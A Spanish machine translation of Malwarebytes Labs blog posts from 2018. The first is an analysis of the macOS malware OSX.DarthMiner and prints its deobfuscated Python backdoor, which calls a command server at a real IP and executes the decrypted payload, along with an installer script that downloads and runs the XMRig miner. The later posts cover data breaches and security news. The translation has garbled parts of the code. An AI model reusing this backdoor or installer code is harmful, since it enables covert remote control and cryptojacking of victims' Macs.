
¿Qué pasa con el script de Python? Resultó estar ofuscado, pero se pudo desenfocar fácilmente, revelando el siguiente script:

import sys; import re, subprocess; cmd = "ps -ef | grep Little \ Snitch | grep -v grep"
ps = subprocess.Popen (cmd, shell = True, stdout = subprocess.PIPE)
out = ps.stdout.read ()
ps.stdout.close ()
Si re.search ("Little Snitch", fuera):
   sys.exit ()
importar urllib2;
UA = 'Mozilla / 5.0 (Windows NT 6.1; WOW64; Trident / 7.0; rv: 11.0) como Gecko'; server = 'http: //46.226.108.171: 4444'; t = '/ news.php'; req = urllib2.Request (servidor + t);
req.add_header ('User-Agent', UA);
req.add_header ('Cookie', "session = SYDFioywtcFbUR5U3EST96SbqVk =");
proxy = urllib2.ProxyHandler ();
o = urllib2.build_opener (proxy);
urllib2.install_opener (o);
a = urllib2.urlopen (req) .read ();
IV = a [0: 4]; datos = a [4:]; clave = IV + '3f239f68a035d40e1891d8b5fdf032d3'; S, j, out = rango (256), 0, []
para i en rango (256):
    j = (j + S [i] + ord (clave [i% len (clave)]))% 256
    S [i], S [j] = S [j], S [i]
i = j = 0
para los datos de char:
    i = (i + 1)% 256
    j = (j + S [i])% 256
    S [i], S [j] = S [j], S [i]
    out.append (chr (ord (char) ^ S [(S [i] + S [j])% 256]))
exec (''. join (out))

Lo primero que hace este script es buscar la presencia de Little Snitch, un cortafuegos saliente de uso común que sería capaz de llamar la atención de los usuarios a la conexión de la red de puerta trasera. Si Little Snitch está presente, el malware se rescata. (Por supuesto, si se instalara un cortafuegos saliente como Little Snitch, ya habría bloqueado la conexión que habría intentado descargar este script, por lo que no vale la pena comprobar en este punto).

Este script abre una conexión a un backend de EmPyre, que es capaz de enviar comandos arbitrarios a la Mac infectada. Una vez que la puerta trasera está abierta, recibe un comando que descarga el siguiente script a /private/tmp/uploadminer.sh y lo ejecuta:

# osascript -e "do shell script \" networksetup -setsecurewebproxy "Wi-Fi" 46.226.108.171 8080 && networksetup -setwebproxy "Wi-Fi" 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http: //mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem \ "con privilegios de administrador"
cd ~ / Library / LaunchAgents
curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist
curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist
launchctl load -w com.apple.rig.plist
launchctl load -w com.proxy.initialize.plist
cd / Usuarios / Compartido
curl -o config.json http://46.226.108.171/config.json
curl -o xmrig http://46.226.108.171/xmrig
chmod + x ./xmrig
rm -rf ./xmrig2
rm -rf ./config2.json
./xmrig -c config.json &

Este script descarga e instala los otros componentes del malware. Se creó un agente de lanzamiento llamado com.proxy.initialize.plist para mantener la puerta trasera abierta de forma persistente ejecutando exactamente el mismo script de Python ofuscado mencionado anteriormente.

El script también descarga el cryptominer XMRig y un archivo de configuración en la carpeta / Users / Shared /, y configura un agente de inicio llamado com.apple.rig.plist para mantener el proceso XMRig en ejecución con esa configuración activa. (El nombre de “com.apple” es una señal de alerta inmediata que fue la causa raíz del descubrimiento de este malware).

Curiosamente, hay un código en esa secuencia de comandos para descargar e instalar un certificado raíz asociado con el software mitmproxy, que es un software capaz de interceptar todo el tráfico web, incluido (con la ayuda del certificado) tráfico “https” cifrado. Sin embargo, ese código fue comentado, lo que indica que no estaba activo.

En la superficie, este malware parece ser bastante inofensivo. Los cryptominers normalmente solo hacen que la computadora se ralentice, gracias a un proceso que absorbe toda la CPU / GPU.

Sin embargo, esto no es sólo un cryptominer. Es importante tener en cuenta que el cryptominer se instaló a través de un comando emitido por la puerta trasera, y es muy posible que haya habido otras órdenes arbitrarias enviadas a Macs infectadas por la puerta trasera en el pasado. Es imposible saber exactamente qué daño podría haber hecho este malware a los sistemas infectados. El hecho de que solo hayamos observado el comportamiento de la minería no significa que nunca haya hecho otras cosas.

Trascendencia

Malwarebytes para Mac detecta este malware como OSX.DarthMiner. Si está infectado, es imposible decir qué otra cosa pudo haber hecho el malware además de criptominar. Es totalmente posible que pueda haber archivos exfiltrados o contraseñas capturadas.

Hay una lección importante que aprender de esto. Se sabe que la piratería de software es una de las actividades más riesgosas que puede realizar en su Mac. El peligro de infección es alto, y esto no es nuevo, sin embargo, las personas aún participan en este comportamiento. Por favor, en el futuro, hágase un favor y no piratee el software. Los costos pueden ser mucho más altos que comprar el software que intenta obtener de forma gratuita.

El nuevo informe ‘Under the Radar’ examina las amenazas modernas y las tecnologías futuras en Seguridad Informática

El nuevo informe 'Under the Radar' examina las amenazas modernas y las tecnologías futuras

El nuevo informe ‘Under the Radar’ examina las amenazas modernas y las tecnologías futuras

Publicado: 5 de diciembre de 2018 por 

Como si no lo hayas escuchado lo suficiente, el panorama de amenazas está cambiando. Siempre está cambiando, y por lo general no es para mejor.

El nuevo malware que vemos que se está desarrollando y desplegando en la naturaleza tiene características y técnicas que les permiten ir más allá de lo que originalmente podían hacer, ya sea con el propósito de una infección adicional o la evasión de la detección.

Con ese fin, decidimos echar un vistazo a algunas de estas amenazas y desentrañar lo que hace que sean difíciles de detectar, quedando fuera de la vista y capaces de propagarse en silencio en toda la organización.

 Descargar: Bajo el radar: El futuro del malware no detectado

Luego examinamos qué tecnologías no están preparadas para estas amenazas, qué tecnología moderna es realmente efectiva contra estas nuevas amenazas y, finalmente, hacia dónde podría conducir la evolución de estas amenazas.

Las amenazas que discutimos:

  • Emotet
  • TrickBot
  • Sorebrect
  • Sam Sam
  • PowerShell, como un vector de ataque.

Al analizar estas amenazas, también observamos dónde se encuentran con mayor frecuencia en las regiones de EE. UU., APAC y EMEA.

Detecciones Emotet 2018 en los Estados Unidos.

Detecciones Emotet 2018 en los Estados Unidos.

Al hacerlo, descubrimos tendencias interesantes que crean nuevas preguntas, algunas de las cuales son claras y otras que necesitan más investigación. En cualquier caso, es evidente que estas amenazas no son antiguas, sino que se van haciendo más y más grandes salpicaduras a medida que avanza el año, de formas interesantes y, a veces, inesperadas.

Detecciones de ransomware Sorebrect en la región APACDetecciones de ransomware Sorebrect en la región APAC

Aunque se desconoce la extensión y las capacidades de las amenazas futuras, tenemos que preparar a las personas para proteger sus datos y experiencias en línea. Desafortunadamente, muchas soluciones de seguridad antiguas no podrán combatir amenazas futuras, y mucho menos lo que está disponible ahora.

Sin embargo, no todas son malas noticias en materia de seguridad, ya que tenemos mucho a nuestro favor como en los desarrollos tecnológicos e innovaciones en las características modernas. Por ejemplo:

  • Detección de comportamiento
  • Bloqueo en la entrega
  • Modos de autodefensa

Estas características son efectivas para combatir las amenazas actuales y pronto serán necesarias para construir la base para futuros desarrollos, tales como:

  • Inteligencia artificial utilizada para desarrollar, distribuir o controlar malware.
  • El continuo desarrollo de malware sin archivos y “invisible”.
  • Las empresas se están convirtiendo en alimento de gusanos para el futuro malware

Descargar: Bajo el radar: El futuro del malware no detectado

Brechas, brechas de ciberseguridad en todas partes, debe ser la temporada.

Brechas, brechas en todas partes, debe ser la temporada.

Brechas, brechas en todas partes, debe ser la temporada.

Publicado: 5 de diciembre de 2018 por 

Después de la semana pasada, las sorpresas de Marriott comenzaron esta semana con revelaciones sobre violaciones en Quora , Dunkin ‘Donuts y 1-800-Flowers .

Quora

Quora es una comunidad en línea que se centra en hacer y responder preguntas. Fue fundada en 2009 por dos ex empleados de Facebook.

Los datos robados pueden referirse a hasta 100 millones de usuarios de la plataforma e incluyen el nombre de usuario, la dirección de correo electrónico y la contraseña cifrada. En algunos casos, los datos importados de otras redes sociales y mensajes privados en la plataforma también se pueden haber tomado.

Para contrarrestar el abuso futuro de las credenciales de inicio de sesión, aconsejamos a los usuarios de Quora que cambien su contraseña y nos aseguremos de que la combinación de credenciales que usaron en Quora no se use en ningún otro lugar. A pesar de que Quora utilizó el cifrado y usó las contraseñas, no es prudente suponer que nadie podrá descifrarlas. Para aquellos que tienen la costumbre de reutilizar contraseñas en diferentes sitios, lea: ¿Por qué no necesita 27 contraseñas diferentes ?

Para aquellos que ya no quieran registrarse en Quora, también le recomendamos que consulte en Configuración y Desconecte todas y cada una de las Cuentas conectadas .

La declaración oficial de Quora se puede consultar para obtener más detalles y actualizaciones.

Dunkin Donuts

Un actor de amenazas logró obtener acceso a las cuentas de Dunkin ‘Donuts Perks. Las cuentas de Perks son un sistema de recompensa de lealtad de uso común. Dunkin ‘Donuts afirma que no hubo violaciones en sus sistemas, pero que las contraseñas reutilizadas fueron las culpables.

hemos sido informados de que terceros obtuvieron nombres de usuario y contraseñas a través de las brechas de seguridad de otras compañías y utilizaron esta información para iniciar sesión en algunas cuentas Dunkin ‘DD Perks.

Como contramedida, forzaron el restablecimiento de contraseñas para todos los clientes que la compañía cree que se vieron afectados. Si usted es uno de estos clientes, los actores de amenazas podrían haber aprendido su nombre y apellidos, las direcciones de correo electrónico, los números de cuenta de 16 dígitos de DD Perks y los códigos QR de DD Perks.

Me repito: para aquellos que tienen la costumbre de reutilizar contraseñas en diferentes sitios, lea: Por qué no necesita 27 contraseñas diferentes .

1-800-flores

El puesto de avanzada canadiense del minorista de regalos de flores y alimentos gourmet informó sobre un incidente en el que un actor de amenazas pudo haber obtenido acceso a los datos de clientes de 75,000 pedidos canadienses, incluidos nombres e información de tarjetas de crédito, durante un período de cuatro años. A pesar de que la violación no afectó a ningún cliente en su sitio web de EE. UU., 1-800-Flowers.com, la compañía ha presentado una notificación ante la oficina del fiscal general en California.

La información de pago robada parece incluir números de tarjetas de crédito y toda la información relacionada: nombres, fechas de vencimiento y códigos de seguridad. Eso es realmente todo lo que un criminal experimentado necesita para saquear tu cuenta.

¿Tienes miedo de ser víctima de esta violación? Esto es lo que puedes hacer para evitar daños adicionales:

  • Revise sus cuentas bancarias y de tarjetas de crédito para detectar actividades sospechosas.
  • Considere una  congelación de crédito  si le preocupa que su información financiera haya sido comprometida.
  • Cuidado con las estafas relacionadas con infracciones; Los cibercriminales saben que esto es una violación masiva y de interés periodístico, por lo que aprovecharán la oportunidad de atrapar a los usuarios a través de la ingeniería social.

O descargue nuestra  lista de verificación de violación de datos  aquí.

epidemia de violación de datos

¿Es la temporada?

Algunas de las brechas recientes ocurrieron hace bastante tiempo o han estado en curso durante años, así que ¿por qué nos lo están diciendo ahora?

Posibles razones:

  • La nueva legislación obliga a las empresas a denunciar las infracciones.
  • Las infracciones ocurren todo el tiempo, pero son serias o grandes, por lo que los medios de comunicación hablan de ellas.
  • Cuando se emite una brecha grande, siempre verás unos pocos más pequeños, intentando esconderte en su sombra.

Si usted es un negocio que busca consejos para evitar ser golpeado por una infracción:

  • Invierta en un  producto de protección de punto final  y un programa de prevención de pérdida de datos para asegurarse de que las alertas sobre ataques similares lleguen a su personal de seguridad lo más rápido posible.
  • Eche un vistazo a su programa de gestión de activos:
    • ¿Tiene un 100 por ciento de contabilidad de todos sus activos externos?
    • ¿Tiene perfiles de usuario uniformes en su negocio para todos los casos de uso?
  • Cuando se trata de un movimiento lateral después de una brecha inicial, no puedes captar lo que no puedes ver. El primer paso para una mejor postura de seguridad es saber con qué tienes que trabajar.

En un mundo donde parece que las infracciones no pueden ser contenidas, los consumidores y las empresas una vez más tienen que lidiar con las consecuencias. Nuestro consejo a las organizaciones: No te conviertas en un cuento de advertencia. Guarde la molestia de sus clientes y salve la reputación de su empresa tomando medidas proactivas para asegurar su empresa hoy.

Humble Bundle alerta a los clientes de que la suscripción revela un error

Humble Bundle alerta a los clientes de que la suscripción revela un error

Humble Bundle alerta a los clientes de que la suscripción revela un error

Publicado: 4 de diciembre de 2018 por 

Querrá revisar su buzón si tiene una cuenta de Humble Bundle, ya que están notificando a algunos clientes un error que se utiliza para recopilar información de suscriptores.

aviso de error

Click para agrandar

El correo dice lo siguiente:

Hola,

La semana pasada, descubrimos que alguien estaba utilizando un error en nuestro código para acceder a información no personal limitada sobre las cuentas de Humble Bundle. El error no expuso las direcciones de correo electrónico, pero la persona lo explotó al probar una lista de direcciones de correo electrónico para ver si coincidían con una cuenta de Humble Bundle. Su dirección de correo electrónico fue una de las coincidencias.

Ahora, esta es la parte de un correo de incumplimiento / error donde tiendes a decir “Oh no, no otra vez” y respira profundamente. Luego ves cuánto de tu información personal se abrió camino hacia el atacante.

Oh no, no otra vez

Por una vez, su nombre, dirección e incluso sus datos de inicio de sesión están aparentemente en buenas manos. O bien este error no se expuso tanto como el atacante esperaba, o simplemente estaban en él para la colección de contenido de nicho.

El correo electrónico continúa:

La información confidencial, como su nombre, dirección de facturación, contraseña e información de pago NO fue expuesta. La única información a la que podrían haber accedido es su estado de suscripción de Humble Monthly. Más específicamente, pueden saber si su suscripción está activa, inactiva o en pausa;cuando su plan expira; y si ha recibido alguna bonificación por recomendación.

Debería explicar en este punto. Puedes comprar juegos de PC independientes en la tienda de Humble, o cualquier otro libro, juego u otra colección que se ofrezca esta semana. Alternativamente, puede suscribirse a la suscripción mensual. Con esto, pagas y luego cada mes te dan una selección aleatoria de títulos de videojuegos. Pueden ser buenos, malos o indiferentes. Es posible que ya tenga algunos, en cuyo caso puede regalarlos a otros. Si no tiene   interés en los títulos de vista previa, puede pausar temporalmente su suscripción por un mes.

Estos son los datos que el explotador de errores ha obtenido, que es definitivamente una cosa extraña y específica para tratar de agarrar.

Consejos de seguridad de Humble Bundle

Volvamos al correo en este punto:

A pesar de que la información revelada es muy limitada, nos tomamos muy en serio la confianza del cliente y deseamos divulgarlo de inmediato. Queremos asegurarnos de que pueda protegerse si alguien utiliza la información recopilada para hacerse pasar por Humble Bundle.

Como recordatorio, aquí hay algunos consejos para mantener su cuenta privada y segura:

  • No comparta su contraseña, datos personales o información de pago con nadie. NUNCA pediremos información como esa.
  • Tenga cuidado con los correos electrónicos con enlaces a sitios desconocidos.Si recibe un correo electrónico sospechoso relacionado con Humble Bundle, contáctenos a través de  nuestro sitio web de soporte  para que podamos investigar más y advertir a otros.
  • Habilite la autenticación de dos factores (2FA) para que incluso si alguien obtiene su contraseña, no podrá acceder a su cuenta. Puede habilitar2FA siguiendo  estas instrucciones .

Le pedimos disculpas por este error. Trabajaremos aún más para garantizar su privacidad y seguridad en el futuro.

Buen consejo, pero ¿cuál es la amenaza?

Uno podría adivinar que el gran riesgo aquí, entonces, es el potencial de phishing de lanza. Podrían explotar esto enviando correos a los suscriptores de que su suscripción está a punto de expirar, o reclamar problemas con los detalles de la tarjeta almacenada. Agregue un poco de texto en color con respecto a su suscripción “actualmente en pausa”, y todo se verá convincente.

El phishing es un gran peligro en línea , y debemos hacer todo lo posible para frustrarlo. Si bien la información aquí expuesta no es tan mala como suele ser, todavía puede causar grandes dolores de cabeza. Esté atento a los dudosos correos de Humble, especialmente si mencionan suscripciones. Ayudará a evitar que tu manojo de alegría se convierta en un paquete de miseria.

Una semana en seguridad informática (26 de noviembre – 2 de diciembre)

 

Una semana en seguridad (26 de noviembre - 2 de diciembre)

Una semana en seguridad (26 de noviembre – 2 de diciembre)

Publicado: 3 de diciembre de 2018 por 

La semana pasada en Malwarebytes Labs, nos dimos un vistazo a nuestras predicciones de seguridad cibernética de 2019 , explicamos por qué Malwarebytes participaron en las pruebas de AV  y la forma en que tomamos parte en una junta de  retirar los botnets masivos anuncio de fraude , advirtió que los sitios web de registro de ESTA todavía acechan en pagado Los anuncios en Google , discutieron  lo que nos han traído los 25 años de cámaras web e informaron sobre el incumplimiento de Marriott que afectó a 500 millones de clientes .

Otras noticias de ciberseguridad:

  • LinkedIn violó la protección de datos al usar 18 millones de direcciones de correo electrónico de no miembros para comprar anuncios específicos en Facebook. (Fuente: TechCrunch)
  • Los investigadores crearon huellas digitales falsas “maestras”  para desbloquear teléfonos inteligentes. (Fuente: placa base)
  • Uber abofeteó con una multa de £ 385K ICO por incumplimiento importante. (Fuente: InfoSecurty Magazine)
  • El desarrollador de Rogue infecta el módulo NodeJS ampliamente utilizado para robar Bitcoins. (Fuente: The Hacker News)
  • Cuando el  FBI  (y no los estafadores) crea un sitio web falso de FedEx. (Fuente: Graham Cluley)
  • Microsoft advierte sobre dos aplicaciones que instalaron certificados raíz y luego filtraron las claves privadas. (Fuente: ZDNet)
  • La aplicación de rastreo de redes sociales Predictim está prohibida en Facebook y Twitter. (Fuente: NakedSecurity)
  • Estafa de soporte técnico: centros de llamadas cerrados por la policía india en colaboración con Microsoft. (Fuente: TechSpot)
  • Alemania detecta nuevos ataques cibernéticos contra políticos, militares y embajadas. (Fuente: DW)
  • Es hora de cambiar su contraseña nuevamente, ya que Dell revela un intento de pirateo. (Fuente: Tendencias digitales)

¡Mantente a salvo, todos!